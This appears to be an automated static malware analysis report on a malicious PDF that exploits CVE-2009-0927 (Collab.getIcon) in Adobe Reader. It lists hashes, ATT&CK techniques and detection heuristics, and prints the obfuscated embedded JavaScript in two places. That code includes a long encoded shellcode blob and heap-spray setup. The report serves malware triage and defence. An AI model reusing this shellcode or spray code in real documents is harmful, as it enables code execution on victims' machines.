Malicious PDF — malware analysis report

Static analysis result for SHA-256 1805be5c53ddbd25…

MALICIOUS

PDF

7.5 KB
MD5: 2fe4cb84afb5e54ac7d25b509770d478 SHA-1: fe488972a79c797821e24002ba2fd00655ccc3ad SHA-256: 1805be5c53ddbd253aceadb81b2c8e834ab05e54295298b1df32eaf7a7a25734
268 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript T1566.001 Spearphishing Attachment

The PDF sample contains embedded JavaScript that leverages the CVE-2009-0927 vulnerability (Collab.getIcon). The JavaScript is heavily obfuscated but is identified as a generic exploit stage, indicating its purpose is to download and execute a secondary payload. This is a common technique for delivering malware via malicious documents.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 7

  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (matched in decompressed stream)
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • ASCIIHexDecode filter (with exploit indicators) medium PDF_FILTER_HEX
    Hex-encoding filter present alongside exploit delivery indicators — often used to hide payload or shellcode bytes
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0006_000.js
2481efddf094d73054afbfd066a1f8fe8b2c4f5c391f68a2861a049cbffb878b		 pdf-javascript-stream PDF /JS object 6 at offset 0x205 6302 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var obiqORDGsvqVrUpwuuaROMSYcbuOSolyADrfdVrmlNsSgjPrTLosmAxpvmesCqocTHbDvlBARGRumK = unescape("%u86b0%u09fd%ue1d3%u2f1c%u6790%u88be%u87f5%u7ef8%u7174%ue302%u4075%u7378%u9224%u3c70%u1579%u99b9%u347d%u727a%u4b7b%u489b%u30b4%u3dd6%u2998%u4ae2%ueb89%ue031%u6625%u46ba%u9fb8%uff11%uc1c6%u4ff9%ua8b6%ub3b7%u4793%u43b5%ua9bb%u770d%u270c%u1435%u0496%u2d1d%u377c%ud428%u054e%ufc83%u4142%ub297%u3fb1%u9366%u78b0%u087d%u19e0%u40f8%u0d48%ubf15%ud423%u7679%u7470%uf910%u49a8%ufd33%u421d%u1a7e%u92d5%ud112%ub3d6%u7377%u7f34%u7572%ub11c%u97b9%u418d%u212c%u0ae2%u71eb%u904e%u6791%u8405%u35e3%u7a4a%u3f27%u3cbe%ub52f%u9698%u9fb2%ub64b%u992d%u24bb%ub8b4%u379b%uf585%u7c7b%u1425%u4643%ufc20%u47b7%u6ba9%ue1d2%u4f0c%u8cba%u2aeb%u04e2%ue386%u3d74%ue080%u777f%u7578%u0473%u9792%u2fb8%u7db9%u9b43%ub4b0%u67bb%u6935%ub7f9%u2247%u79e1%u407c%u347a%u76bf%u414a%ub149%u3825%ub6d4%u1d96%u1b4f%u3fd5%u151c%u3b66%u42d6%uf83a%ufd0b%ub32d%u057b%u9f99%u3ca9%u983d%u0d4e%ua837%u2772%u144b%uba93%ub224%u7e71%u2c46%u91b5%u70be%uf539%ufc32%u488d%u187e%u0ceb%ub090%u483f%u417f%u407c%u7a1c%u0371%uc0fe%ub8d5%u7378%ue201%u3d7d%uf681%u35e0%u932f%u2b98%u70f5%u2405%u1314%ufdd0%u8c9b%uf8d2%u6749%u0c97%u9127%u7475%uba3c%ua92d%ub6bb%u768d%u4b37%ub534%u2546%ua84f%u7799%u0d4a%uf93b%u4779%ub243%u9096%ub9b3%u667b%u4e92%u42be%ufc33%ud389%u2ce1%u1db7%ub49f%u8115%ud6f7%u72bf%u8404%ub1d4%ue310%u777c%ueb21%ue131%uf839%ud088%ud6d1%ub799%ufc2b%u730c%u2479%u722c%uf603%u41e0%ub38d%u7067%u464b%u9f92%u7b76%u4e78%u37bb%u140d%u6b3d%u29d5%u75e3%u973f%u05a8%u2f7e%ub096%u7498%u7f7d%u3504%u47b9%u34ba%u257a%u7193%u2040%u9bf5%ub566%ufd85%ua943%ub2b6%u4a91%u83be%ue2c0%u9048%u2715%u2d1d%ud469%u3c49%u42b1%u1cb8%uf923%ub4bf%u094f%u76e1%u430d%u2779%u15bf%ue21a%u4a77%u3d7c%u0273%ua9d4%u307e%u71eb%ue011%u3c70%u7874%u251c%u7d93%ub935%ub7ba%u0c9f%ub0b4%ub391%u4f8d%u4b2f%u1dbb%u46b8%u7b05%uf828%u3f41%u7f75%u1267%u13e3%u72fd%ube4e%u9297%ub149%u142c%u0166%u9bd6%u377a%u42a8%u24b2%u4879%u9998%u347e%u86b6%ub5f5%u047c%u2a72%u90f9%u4074%u2d7b%u0b7f%ue3c1%ud518%u4770%u1b78%u96fc%ud580%u4071%u3275%u4eeb%ub8b3%u7d3f%ubb3d%u73ba%u0a1d%u22e0%u37fd%u7a1c%ue108%u960d%uf838%u76b2%ue219%u9225%u98b6%u4227%u3514%ub593%u0c3c%u054b%ud604%u3a34%u46fc%u9b8d%ub1b7%u66b0%ud4a9%u4f99%uf987%u1577%ube91%u2db4%u4a9f%u4849%uf5b9%u2fa8%u47bf%u6724%u9741%u902c%udd43%ub8c5%u94e6%u614a%uc92b%u74d9%uf424%u44b1%u315a%u1942%u4203%u8319%ufcea%u6104%u89b6%u8a41%u4a47%u0231%u7ba2%u7063%u2ea6%uf2b3%uc2ea%u5638%u501f%u7f4c%ud110%u59fa%ue21f%u65cb%u20f3%u1a4a%u750e%u23ac%u88c1%u64ad%u623c%u3dff%ud14a%u4aef%uea0e%u9d0e%u5204%u9868%u27db%ua3c2%u970b%ueb59%u93b3%ucc05%u70c2%u3056%ufd8c%uc2ac%ud40f%u2bfd%u183e%u1251%u958e%u52a8%u4629%ua8df%ufb49%u6ae7%u2733%u6f62%uac93%u4bd4%u6025%u1882%ucd29%u47c1%ud02e%ufc06%u594a%ud3a9%u19da%uf78d%ufa87%uaeac%uac6d%ub1d1%u11ca%ub977%u46f9%ue001%u9997%u9e80%u9ad1%ua09a%uf371%u2bab%u841e%ufe34%u7a5a%ua37f%u13cb%u31d9%u7e4e%uefda%u878d%u1a58%u7c6e%u6f40%u386b%u83c7%u5101%ua3ad%u52b6%uc7e4%uc955%u2726%u31c5%u5e42%u127b%ud3a5%u7d5b%u33db%ue2be%u6821%u8bfa%ue536%u316f%u71d6%u9903%u1447%uf987%u8dd4%u8e33%u23b3%u1ddb%u9c61%uc21d%ue606%u553d%u78a1%u36da%uf646%ubd7e%u95cd%u610e%u0379%ued9c%ua2e5%u6210%u478c%u54a1%ud03a%ua93d");
		var wsxrkFTzHkSZMzOigJzSfZCDCjxKGLTLHPauflVQgSkZzweXoIWUpUHasIwZzaPYfbSX ="";
		for (bWmrYAmWmjeGNPhsFKdjiWpryvmmNenjvUfbQRThuWBYMrNQKFJAcpsljyrqaYEsYmDeCXkfQMxkNFUpWKvfkxIsrkuSHIYlgc=128;bWmrYAmWmjeGNPhsFKdjiWpryvmmNenjvUfbQRThuWBYMrNQKFJAcpsljyrqaYEsYmDeCXkfQMxkNFUpWKvfkxIsrkuSHIYlgc>=0;--bWmrYAmWmjeGNPhsFKdjiWpryvmmNenjvUfbQRThuWBYMrNQKFJAcpsljyrqaYEsYmDeCXkfQMxkNFUpWKvfkxIsrkuSHIYlgc) wsxrkFTzHkSZMzOigJzSfZCDCjxKGLTLHPauflVQgSkZzweXoIWUpUHasIwZzaPYfbSX += unescape("%u0c2c%u48b1");
		tnHVyCLKCwmlYkfIFTHsmgahHOgptOktaqJmzk = wsxrkFTzHkSZMzOigJzSfZCDCjxKGLTLHPauflVQgSkZzweXoIWUpUHasIwZzaPYfbSX + obiqORDGsvqVrUpwuuaROMSYcbuOSolyADrfdVrmlNsSgjPrTLosmAxpvmesCqocTHbDvlBARGRumK;
		UMVBMGNpYpkjLBbyTueNUXNqRqMUconpfEKSvQSzXWeghbKeCvaCldzZmWupPXSTEaQnFRTLGdCdZktAzoMOcMWsCfnrTwrMmYqZ = unescape("%u0c2c%u48b1");
		BiUThIXNlvPplcDOGLrWHvICjprIAeVImIwQSKNRFIFqSTvjbckSH = 20;
		POfXXwxiRWGIwwamukAohzVquBuQdhoFlHkAxgSoxKJk
... (truncated)
generic_stage_recovery_000.js
d0072ea97353284eb299d8923141b63a107927b59d1681a2f8979ed248a82da9		 deobfuscated-js generic stage recovery percent-decode from JavaScript object 6 at offset 0x205 6300 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var obiqORDGsvqVrUpwuuaROMSYcbuOSolyADrfdVrmlNsSgjPrTLosmAxpvmesCqocTHbDvlBARGRumK = unescape("%u86b0%u09fd%ue1d3%u2f1c%u6790%u88be%u87f5%u7ef8%u7174%ue302%u4075%u7378%u9224%u3c70%u1579%u99b9%u347d%u727a%u4b7b%u489b%u30b4%u3dd6%u2998%u4ae2%ueb89%ue031%u6625%u46ba%u9fb8%uff11%uc1c6%u4ff9%ua8b6%ub3b7%u4793%u43b5%ua9bb%u770d%u270c%u1435%u0496%u2d1d%u377c%ud428%u054e%ufc83%u4142%ub297%u3fb1%u9366%u78b0%u087d%u19e0%u40f8%u0d48%ubf15%ud423%u7679%u7470%uf910%u49a8%ufd33%u421d%u1a7e%u92d5%ud112%ub3d6%u7377%u7f34%u7572%ub11c%u97b9%u418d%u212c%u0ae2%u71eb%u904e%u6791%u8405%u35e3%u7a4a%u3f27%u3cbe%ub52f%u9698%u9fb2%ub64b%u992d%u24bb%ub8b4%u379b%uf585%u7c7b%u1425%u4643%ufc20%u47b7%u6ba9%ue1d2%u4f0c%u8cba%u2aeb%u04e2%ue386%u3d74%ue080%u777f%u7578%u0473%u9792%u2fb8%u7db9%u9b43%ub4b0%u67bb%u6935%ub7f9%u2247%u79e1%u407c%u347a%u76bf%u414a%ub149%u3825%ub6d4%u1d96%u1b4f%u3fd5%u151c%u3b66%u42d6%uf83a%ufd0b%ub32d%u057b%u9f99%u3ca9%u983d%u0d4e%ua837%u2772%u144b%uba93%ub224%u7e71%u2c46%u91b5%u70be%uf539%ufc32%u488d%u187e%u0ceb%ub090%u483f%u417f%u407c%u7a1c%u0371%uc0fe%ub8d5%u7378%ue201%u3d7d%uf681%u35e0%u932f%u2b98%u70f5%u2405%u1314%ufdd0%u8c9b%uf8d2%u6749%u0c97%u9127%u7475%uba3c%ua92d%ub6bb%u768d%u4b37%ub534%u2546%ua84f%u7799%u0d4a%uf93b%u4779%ub243%u9096%ub9b3%u667b%u4e92%u42be%ufc33%ud389%u2ce1%u1db7%ub49f%u8115%ud6f7%u72bf%u8404%ub1d4%ue310%u777c%ueb21%ue131%uf839%ud088%ud6d1%ub799%ufc2b%u730c%u2479%u722c%uf603%u41e0%ub38d%u7067%u464b%u9f92%u7b76%u4e78%u37bb%u140d%u6b3d%u29d5%u75e3%u973f%u05a8%u2f7e%ub096%u7498%u7f7d%u3504%u47b9%u34ba%u257a%u7193%u2040%u9bf5%ub566%ufd85%ua943%ub2b6%u4a91%u83be%ue2c0%u9048%u2715%u2d1d%ud469%u3c49%u42b1%u1cb8%uf923%ub4bf%u094f%u76e1%u430d%u2779%u15bf%ue21a%u4a77%u3d7c%u0273%ua9d4%u307e%u71eb%ue011%u3c70%u7874%u251c%u7d93%ub935%ub7ba%u0c9f%ub0b4%ub391%u4f8d%u4b2f%u1dbb%u46b8%u7b05%uf828%u3f41%u7f75%u1267%u13e3%u72fd%ube4e%u9297%ub149%u142c%u0166%u9bd6%u377a%u42a8%u24b2%u4879%u9998%u347e%u86b6%ub5f5%u047c%u2a72%u90f9%u4074%u2d7b%u0b7f%ue3c1%ud518%u4770%u1b78%u96fc%ud580%u4071%u3275%u4eeb%ub8b3%u7d3f%ubb3d%u73ba%u0a1d%u22e0%u37fd%u7a1c%ue108%u960d%uf838%u76b2%ue219%u9225%u98b6%u4227%u3514%ub593%u0c3c%u054b%ud604%u3a34%u46fc%u9b8d%ub1b7%u66b0%ud4a9%u4f99%uf987%u1577%ube91%u2db4%u4a9f%u4849%uf5b9%u2fa8%u47bf%u6724%u9741%u902c%udd43%ub8c5%u94e6%u614a%uc92b%u74d9%uf424%u44b1%u315a%u1942%u4203%u8319%ufcea%u6104%u89b6%u8a41%u4a47%u0231%u7ba2%u7063%u2ea6%uf2b3%uc2ea%u5638%u501f%u7f4c%ud110%u59fa%ue21f%u65cb%u20f3%u1a4a%u750e%u23ac%u88c1%u64ad%u623c%u3dff%ud14a%u4aef%uea0e%u9d0e%u5204%u9868%u27db%ua3c2%u970b%ueb59%u93b3%ucc05%u70c2%u3056%ufd8c%uc2ac%ud40f%u2bfd%u183e%u1251%u958e%u52a8%u4629%ua8df%ufb49%u6ae7%u2733%u6f62%uac93%u4bd4%u6025%u1882%ucd29%u47c1%ud02e%ufc06%u594a%ud3a9%u19da%uf78d%ufa87%uaeac%uac6d%ub1d1%u11ca%ub977%u46f9%ue001%u9997%u9e80%u9ad1%ua09a%uf371%u2bab%u841e%ufe34%u7a5a%ua37f%u13cb%u31d9%u7e4e%uefda%u878d%u1a58%u7c6e%u6f40%u386b%u83c7%u5101%ua3ad%u52b6%uc7e4%uc955%u2726%u31c5%u5e42%u127b%ud3a5%u7d5b%u33db%ue2be%u6821%u8bfa%ue536%u316f%u71d6%u9903%u1447%uf987%u8dd4%u8e33%u23b3%u1ddb%u9c61%uc21d%ue606%u553d%u78a1%u36da%uf646%ubd7e%u95cd%u610e%u0379%ued9c%ua2e5%u6210%u478c%u54a1%ud03a%ua93d");
		var wsxrkFTzHkSZMzOigJzSfZCDCjxKGLTLHPauflVQgSkZzweXoIWUpUHasIwZzaPYfbSX ="";
		for (bWmrYAmWmjeGNPhsFKdjiWpryvmmNenjvUfbQRThuWBYMrNQKFJAcpsljyrqaYEsYmDeCXkfQMxkNFUpWKvfkxIsrkuSHIYlgc=128;bWmrYAmWmjeGNPhsFKdjiWpryvmmNenjvUfbQRThuWBYMrNQKFJAcpsljyrqaYEsYmDeCXkfQMxkNFUpWKvfkxIsrkuSHIYlgc>=0;--bWmrYAmWmjeGNPhsFKdjiWpryvmmNenjvUfbQRThuWBYMrNQKFJAcpsljyrqaYEsYmDeCXkfQMxkNFUpWKvfkxIsrkuSHIYlgc) wsxrkFTzHkSZMzOigJzSfZCDCjxKGLTLHPauflVQgSkZzweXoIWUpUHasIwZzaPYfbSX += unescape("%u0c2c%u48b1");
		tnHVyCLKCwmlYkfIFTHsmgahHOgptOktaqJmzk = wsxrkFTzHkSZMzOigJzSfZCDCjxKGLTLHPauflVQgSkZzweXoIWUpUHasIwZzaPYfbSX + obiqORDGsvqVrUpwuuaROMSYcbuOSolyADrfdVrmlNsSgjPrTLosmAxpvmesCqocTHbDvlBARGRumK;
		UMVBMGNpYpkjLBbyTueNUXNqRqMUconpfEKSvQSzXWeghbKeCvaCldzZmWupPXSTEaQnFRTLGdCdZktAzoMOcMWsCfnrTwrMmYqZ = unescape("%u0c2c%u48b1");
		BiUThIXNlvPplcDOGLrWHvICjprIAeVImIwQSKNRFIFqSTvjbckSH = 20;
		POfXXwxiRWGIwwamukAohzVquBuQdhoFlHkAxgSoxKJk
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.